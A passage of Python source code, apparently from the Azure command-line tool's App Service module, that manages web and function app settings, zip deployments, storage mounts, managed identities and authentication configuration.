deployment_container_image_name) if non_url: return None parsed_url = urlparse(deployment_container_image_name) if parsed_url.scheme: return parsed_url.hostname hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname return "https://{}".format(hostname) def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None): if not settings and not slot_settings: raise CLIError('Usage Error: --settings |--slot-settings') settings = settings or [] slot_settings = slot_settings or [] app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) result, slot_result = {}, {} # pylint: disable=too-many-nested-blocks for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]: for s in src: try: temp = shell_safe_json_parse(s) if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command for t in temp: if 'slotSetting' in t.keys(): slot_result[t['name']] = t['slotSetting'] if setting_type == "SlotSettings": slot_result[t['name']] = True result[t['name']] = t['value'] else: dest.update(temp) except CLIError: setting_name, value = s.split('=', 1) dest[setting_name] = value result.update(dest) for setting_name, value in result.items(): app_settings.properties[setting_name] = value client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings, slot, client) app_settings_slot_cfg_names = [] if slot_result: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or [] # Slot settings logic to add a new setting(s) or remove an existing setting(s) for slot_setting_name, value in slot_result.items(): if value and slot_setting_name not in slot_cfg_names.app_setting_names: slot_cfg_names.app_setting_names.append(slot_setting_name) elif not value and slot_setting_name in slot_cfg_names.app_setting_names: slot_cfg_names.app_setting_names.remove(slot_setting_name) app_settings_slot_cfg_names = slot_cfg_names.app_setting_names client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return _build_app_settings_output(result.properties, app_settings_slot_cfg_names) def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name, share_name, access_key, mount_path=None, slot=None, slot_setting=False): AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue') azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) if custom_id in azure_storage_accounts.properties: raise CLIError("Site already configured with an Azure storage account with the id '{}'. " "Use 'az webapp config storage-account update' to update an existing " "Azure storage account configuration.".format(custom_id)) azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name, share_name=share_name, access_key=access_key, mount_path=mount_path) client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts, slot, client) if slot_setting: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or [] if custom_id not in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.append(custom_id) client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None, share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False): AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue') azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) existing_account_config = azure_storage_accounts.properties.pop(custom_id, None) if not existing_account_config: raise CLIError("No Azure storage account configuration found with the id '{}'. " "Use 'az webapp config storage-account add' to add a new " "Azure storage account configuration.".format(custom_id)) new_account_config = AzureStorageInfoValue( type=storage_type or existing_account_config.type, account_name=account_name or existing_account_config.account_name, share_name=share_name or existing_account_config.share_name, access_key=access_key or existing_account_config.access_key, mount_path=mount_path or existing_account_config.mount_path ) azure_storage_accounts.properties[custom_id] = new_account_config client = web_client_factory(cmd.cli_ctx) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_azure_storage_accounts', azure_storage_accounts, slot, client) if slot_setting: slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or [] if custom_id not in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.append(custom_id) client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) return result.properties def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None): client = web_client_factory(cmd.cli_ctx) app = client.web_apps.get(resource_group_name, name) if app is None: raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. ' 'Please make sure these values are correct.'.format(name, resource_group_name)) parse_plan_id = parse_resource_id(app.server_farm_id) plan_info = None retry_delay = 10 # seconds # We need to retry getting the plan because sometimes if the plan is created as part of function app, # it can take a couple of tries before it gets the plan for _ in range(5): plan_info = client.app_service_plans.get(parse_plan_id['resource_group'], parse_plan_id['name']) if plan_info is not None: break time.sleep(retry_delay) is_consumption = is_plan_consumption(cmd, plan_info) if (not build_remote) and is_consumption and app.reserved: return upload_zip_to_storage(cmd, resource_group_name, name, src, slot) if build_remote and app.reserved: add_remote_build_app_settings(cmd, resource_group_name, name, slot) elif app.reserved: remove_remote_build_app_settings(cmd, resource_group_name, name, slot) return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot) def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None): return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot) def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None): logger.warning("Getting scm site credentials for zip deployment") user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) try: scm_url = _get_scm_url(cmd, resource_group_name, name, slot) except ValueError: raise CLIError('Failed to fetch scm url for function app') zip_url = scm_url + '/api/zipdeploy?isAsync=true' deployment_status_url = scm_url + '/api/deployments/latest' import urllib3 authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password)) headers = authorization headers['Content-Type'] = 'application/octet-stream' headers['Cache-Control'] = 'no-cache' headers['User-Agent'] = get_az_user_agent() import requests import os from azure.cli.core.util import should_disable_connection_verify # Read file content with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs: zip_content = fs.read() logger.warning("Starting zip deployment. This operation can take a while to complete ...") res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify()) logger.warning("Deployment endpoint responded with status code %d", res.status_code) # check the status of async deployment if res.status_code == 202: response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url, authorization, timeout) return response # check if there's an ongoing process if res.status_code == 409: raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has " "WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the " "WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config " "appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription " "MySubscription' to list app settings and 'az webapp config appsettings delete " "--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> " "to delete them.".format(deployment_status_url)) # check if an error occured during deployment if res.status_code: raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}" .format(res.status_code, res.text)) def add_remote_build_app_settings(cmd, resource_group_name, name, slot): settings = get_app_settings(cmd, resource_group_name, name, slot) scm_do_build_during_deployment = None website_run_from_package = None enable_oryx_build = None app_settings_should_not_have = [] app_settings_should_contain = {} for keyval in settings: value = keyval['value'].lower() if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT': scm_do_build_during_deployment = value in ('true', '1') if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE': website_run_from_package = value if keyval['name'] == 'ENABLE_ORYX_BUILD': enable_oryx_build = value if scm_do_build_during_deployment is not True: logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true") update_app_settings(cmd, resource_group_name, name, [ "SCM_DO_BUILD_DURING_DEPLOYMENT=true" ], slot) app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true' if website_run_from_package: logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting") delete_app_settings(cmd, resource_group_name, name, [ "WEBSITE_RUN_FROM_PACKAGE" ], slot) app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE') if enable_oryx_build: logger.warning("Removing ENABLE_ORYX_BUILD app setting") delete_app_settings(cmd, resource_group_name, name, [ "ENABLE_ORYX_BUILD" ], slot) app_settings_should_not_have.append('ENABLE_ORYX_BUILD') # Wait for scm site to get the latest app settings if app_settings_should_not_have or app_settings_should_contain: logger.warning("Waiting SCM site to be updated with the latest app settings") scm_is_up_to_date = False retries = 10 while not scm_is_up_to_date and retries >= 0: scm_is_up_to_date = validate_app_settings_in_scm( cmd, resource_group_name, name, slot, should_contain=app_settings_should_contain, should_not_have=app_settings_should_not_have) retries -= 1 time.sleep(5) if retries < 0: logger.warning("App settings may not be propagated to the SCM site.") def remove_remote_build_app_settings(cmd, resource_group_name, name, slot): settings = get_app_settings(cmd, resource_group_name, name, slot) scm_do_build_during_deployment = None app_settings_should_contain = {} for keyval in settings: value = keyval['value'].lower() if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT': scm_do_build_during_deployment = value in ('true', '1') if scm_do_build_during_deployment is not False: logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false") update_app_settings(cmd, resource_group_name, name, [ "SCM_DO_BUILD_DURING_DEPLOYMENT=false" ], slot) app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false' # Wait for scm site to get the latest app settings if app_settings_should_contain: logger.warning("Waiting SCM site to be updated with the latest app settings") scm_is_up_to_date = False retries = 10 while not scm_is_up_to_date and retries >= 0: scm_is_up_to_date = validate_app_settings_in_scm( cmd, resource_group_name, name, slot, should_contain=app_settings_should_contain) retries -= 1 time.sleep(5) if retries < 0: logger.warning("App settings may not be propagated to the SCM site") def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) storage_connection = None for keyval in settings: if keyval['name'] == 'AzureWebJobsStorage': storage_connection = str(keyval['value']) if storage_connection is None: raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting') container_name = "function-releases" blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4())) BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService') block_blob_service = BlockBlobService(connection_string=storage_connection) if not block_blob_service.exists(container_name): block_blob_service.create_container(container_name) # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3 def progress_callback(current, total): total_length = 30 filled_length = int(round(total_length * current) / float(total)) percents = round(100.0 * current / float(total), 1) progress_bar = '=' * filled_length + '-' * (total_length - filled_length) progress_message = 'Uploading {} {}%'.format(progress_bar, percents) cmd.cli_ctx.get_progress_controller().add(message=progress_message) block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True, progress_callback=progress_callback) now = datetime.datetime.utcnow() blob_start = now - datetime.timedelta(minutes=10) blob_end = now + datetime.timedelta(weeks=520) BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions') blob_token = block_blob_service.generate_blob_shared_access_signature(container_name, blob_name, permission=BlobPermissions(read=True), expiry=blob_end, start=blob_start) blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token) website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri) update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting]) client = web_client_factory(cmd.cli_ctx) try: logger.info('\nSyncing Triggers...') if slot is not None: client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot) else: client.web_apps.sync_function_triggers(resource_group_name, name) except CloudError as ex: # This SDK function throws an error if Status Code is 200 if ex.status_code != 200: raise ex except Exception as ex: # pylint: disable=broad-except if ex.response.status_code != 200: raise ex def show_webapp(cmd, resource_group_name, name, slot=None): return _show_app(cmd, resource_group_name, name, "webapp", slot) # for generic updater def get_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument instance = kwargs['parameters'] client = web_client_factory(cmd.cli_ctx) updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance) if slot: kwargs['slot'] = slot return updater(**kwargs) def update_webapp(instance, client_affinity_enabled=None, https_only=None): if 'function' in instance.kind: raise CLIError("please use 'az functionapp update' to update this function app") if client_affinity_enabled is not None: instance.client_affinity_enabled = client_affinity_enabled == 'true' if https_only is not None: instance.https_only = https_only == 'true' return instance def update_functionapp(cmd, instance, plan=None, force=False): client = web_client_factory(cmd.cli_ctx) if plan is not None: if is_valid_resource_id(plan): dest_parse_result = parse_resource_id(plan) dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'], dest_parse_result['name']) else: dest_plan_info = client.app_service_plans.get(instance.resource_group, plan) if dest_plan_info is None: raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan)) validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force) instance.server_farm_id = dest_plan_info.id return instance def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force): general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.' src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id) src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'], src_parse_result['name']) if src_plan_info is None: raise ResourceNotFoundError('Could not determine the current plan of the functionapp') # Ensure all plans involved are windows. Reserved = true indicates Linux. if src_plan_info.reserved or dest_plan_instance.reserved: raise ValidationError('This feature currently supports windows to windows plan migrations. For other ' 'migrations, please redeploy.') src_is_premium = is_plan_elastic_premium(cmd, src_plan_info) dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance) if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium): raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg) if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)): raise ValidationError('You are trying to move to a plan that is not a Consumption or an ' 'Elastic Premium plan. ' + general_switch_msg) if src_is_premium and dest_is_consumption: logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of ' 'functionality and cause the app to break. Please ensure the functionapp is compatible ' 'with a Consumption plan and is not using any features only available in Premium.') if not force: raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption ' 'plan, please re-run this command with the \'--force\' flag.') def set_functionapp(cmd, resource_group_name, name, **kwargs): instance = kwargs['parameters'] client = web_client_factory(cmd.cli_ctx) return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance) def get_functionapp(cmd, resource_group_name, name, slot=None): function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not function_app or 'function' not in function_app.kind: raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name)) return function_app def show_functionapp(cmd, resource_group_name, name, slot=None): return _show_app(cmd, resource_group_name, name, 'functionapp', slot) def list_webapp(cmd, resource_group_name=None): full_list = _list_app(cmd.cli_ctx, resource_group_name) # ignore apps with kind==null & not functions apps return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list)) def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None): result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot) return sorted(result, key=lambda site: site.deleted_site_id) def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None): DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest') request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app', slot, request) def list_function_app(cmd, resource_group_name=None): return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(), _list_app(cmd.cli_ctx, resource_group_name))) def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None): app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not app: raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format( cmd_app_type, name, resource_group_name)) app_type = _kind_to_app_type(app.kind) if app else None if app_type != cmd_app_type: raise ResourceNotFoundError( "Unable to find {app_type} '{name}', in resource group '{resource_group}'".format( app_type=cmd_app_type, name=name, resource_group=resource_group_name), "Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type)) app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot) _rename_server_farm_props(app) _fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot) return app def _kind_to_app_type(kind): if "workflow" in kind: return "logicapp" if "function" in kind: return "functionapp" return "webapp" def _list_app(cli_ctx, resource_group_name=None): client = web_client_factory(cli_ctx) if resource_group_name: result = list(client.web_apps.list_by_resource_group(resource_group_name)) else: result = list(client.web_apps.list()) for webapp in result: _rename_server_farm_props(webapp) return result def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None): client = web_client_factory(cli_ctx) locations = _get_deleted_apps_locations(cli_ctx) result = [] for location in locations: result = result + list(client.deleted_web_apps.list_by_location(location)) if resource_group_name: result = [r for r in result if r.resource_group == resource_group_name] if name: result = [r for r in result if r.deleted_site_name.lower() == name.lower()] if slot: result = [r for r in result if r.slot.lower() == slot.lower()] return result def _build_identities_info(identities): from ._appservice_utils import MSI_LOCAL_ID identities = identities or [] identity_types = [] if not identities or MSI_LOCAL_ID in identities: identity_types.append('SystemAssigned') external_identities = [x for x in identities if x != MSI_LOCAL_ID] if external_identities: identity_types.append('UserAssigned') identity_types = ','.join(identity_types) info = {'type': identity_types} if external_identities: info['userAssignedIdentities'] = {e: {} for e in external_identities} return (info, identity_types, external_identities, 'SystemAssigned' in identity_types) def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None): ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity', 'ManagedServiceIdentityType') UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities) def getter(): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def setter(webapp): if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned: identity_types = ResourceIdentityType.system_assigned_user_assigned elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities: identity_types = ResourceIdentityType.system_assigned_user_assigned elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity: identity_types = ResourceIdentityType.system_assigned_user_assigned elif external_identities and enable_local_identity: identity_types = ResourceIdentityType.system_assigned_user_assigned elif external_identities: identity_types = ResourceIdentityType.user_assigned else: identity_types = ResourceIdentityType.system_assigned if webapp.identity: webapp.identity.type = identity_types else: webapp.identity = ManagedServiceIdentity(type=identity_types) if external_identities: if not webapp.identity.user_assigned_identities: webapp.identity.user_assigned_identities = {} for identity in external_identities: webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue() poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', extra_parameter=webapp, slot=slot) return LongRunningOperation(cmd.cli_ctx)(poller) from azure.cli.core.commands.arm import assign_identity as _assign_identity webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope) return webapp.identity def show_identity(cmd, resource_group_name, name, slot=None): web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not web_app: raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name)) return web_app.identity def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None): IdentityType = cmd.get_models('ManagedServiceIdentityType') UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities) def getter(): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def setter(webapp): if webapp.identity is None: return webapp to_remove = [] existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())} if external_identities: to_remove = {x.lower() for x in external_identities} non_existing = to_remove.difference(existing_identities) if non_existing: raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name)) if not list(existing_identities - to_remove): if webapp.identity.type == IdentityType.user_assigned: webapp.identity.type = IdentityType.none elif webapp.identity.type == IdentityType.system_assigned_user_assigned: webapp.identity.type = IdentityType.system_assigned webapp.identity.user_assigned_identities = None if remove_local_identity: webapp.identity.type = (IdentityType.none if webapp.identity.type == IdentityType.system_assigned or webapp.identity.type == IdentityType.none else IdentityType.user_assigned) if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]: webapp.identity.user_assigned_identities = {} if to_remove: for identity in list(existing_identities - to_remove): webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue() else: for identity in list(existing_identities): webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue() poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp) return LongRunningOperation(cmd.cli_ctx)(poller) from azure.cli.core.commands.arm import assign_identity as _assign_identity webapp = _assign_identity(cmd.cli_ctx, getter, setter) return webapp.identity def get_auth_settings(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot) def is_auth_runtime_version_valid(runtime_version=None): if runtime_version is None: return True if runtime_version.startswith("~") and len(runtime_version) > 1: try: int(runtime_version[1:]) except ValueError: return False return True split_versions = runtime_version.split('.') if len(split_versions) != 3: return False for version in split_versions: try: int(version) except ValueError: return False return True def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument token_refresh_extension_hours=None, # pylint: disable=unused-argument allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument microsoft_account_client_secret=None, # pylint: disable=unused-argument microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument auth_settings = get_auth_settings(cmd, resource_group_name, name, slot) UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction') if action == 'AllowAnonymous': auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous elif action: auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page auth_settings.default_provider = AUTH_TYPES[action] # validate runtime version if not is_auth_runtime_version_valid(runtime_version): raise CLIError('Usage Error: --runtime-version set to invalid value') import inspect frame = inspect.currentframe() bool_flags = ['enabled', 'token_store_enabled'] # note: getargvalues is used already in azure.cli.core.commands. # and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[2:]: if values.get(arg, None): setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings) def list_instances(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot) # Currently using hardcoded values instead of this function. This function calls the stacks API; # Stacks API is updated with Antares deployments, # which are infrequent and don't line up with stacks EOL schedule. def list_runtimes(cmd, linux=False): client = web_client_factory(cmd.cli_ctx) runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux) return [s['displayName'] for s in runtime_helper.stacks] def list_runtimes_hardcoded(linux=False): if linux: return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']] return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']] def delete_function_app(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot) def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None, keep_dns_registration=None, slot=None): # pylint: disable=unused-argument client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.delete_slot(resource_group_name, name, slot, delete_metrics=False if keep_metrics else None, delete_empty_server_farm=False if keep_empty_plan else None) else: client.web_apps.delete(resource_group_name, name, delete_metrics=False if keep_metrics else None, delete_empty_server_farm=False if keep_empty_plan else None) def stop_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot) def start_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot) def restart_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot) def get_site_configs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot) def get_app_settings(cmd, resource_group_name, name, slot=None): result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) client = web_client_factory(cmd.cli_ctx) slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names return _build_app_settings_output(result.properties, slot_app_setting_names) # Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint # should_have [] is a list of app settings which are expected to be set # should_not_have [] is a list of app settings which are expected to be absent # should_contain {} is a dictionary of app settings which are expected to be set with precise values # Return True if validation succeeded def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None, should_have=None, should_not_have=None, should_contain=None): scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot) scm_setting_keys = set(scm_settings.keys()) if should_have and not set(should_have).issubset(scm_setting_keys): return False if should_not_have and set(should_not_have).intersection(scm_setting_keys): return False temp_setting = scm_settings.copy() temp_setting.update(should_contain or {}) if temp_setting != scm_settings: return False return True @retryable_method(3, 5) def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) settings_url = '{}/api/settings'.format(scm_url) username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) headers = { 'Content-Type': 'application/octet-stream', 'Cache-Control': 'no-cache', 'User-Agent': get_az_user_agent() } import requests response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3) return response.json() or {} def get_connection_strings(cmd, resource_group_name, name, slot=None): result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \ .connection_string_names or [] result = [{'name': p, 'value': result.properties[p].value, 'type':result.properties[p].type, 'slotSetting': p in slot_constr_names} for p in result.properties] return result def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \ .azure_storage_config_names or [] return [{'name': p, 'value': result.properties[p], 'slotSetting': p in slot_azure_storage_config_names} for p in result.properties] def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None): profiles = list_publish_profiles(cmd, resource_group_name, name, slot) try: url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP') setattr(webapp, 'ftpPublishingUrl', url) except StopIteration: pass return webapp def _format_fx_version(custom_image_name, container_config_type=None): lower_custom_image_name = custom_image_name.lower() if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name: custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "") fx_version = custom_image_name.strip() fx_version_lower = fx_version.lower() # handles case of only spaces if fx_version: if container_config_type: fx_version = '{}|{}'.format(container_config_type, custom_image_name) elif not fx_version_lower.startswith('docker|'): fx_version = '{}|{}'.format('DOCKER', custom_image_name) else: fx_version = ' ' return fx_version def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None): fx_version = _format_fx_version(custom_image_name) web_app = get_webapp(cmd, resource_group_name, name, slot) if not web_app: raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name)) linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None windows_fx = fx_version if web_app.is_xenon else None return update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot) def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None): return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot) def _get_fx_version(cmd, resource_group_name, name, slot=None): site_config = get_site_configs(cmd, resource_group_name, name, slot) return site_config.linux_fx_version or site_config.windows_fx_version or '' def url_validator(url): try: result = urlparse(url) return all([result.scheme, result.netloc, result.path]) except ValueError: return False def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None): from base64 import b64decode linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot) if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES): raise 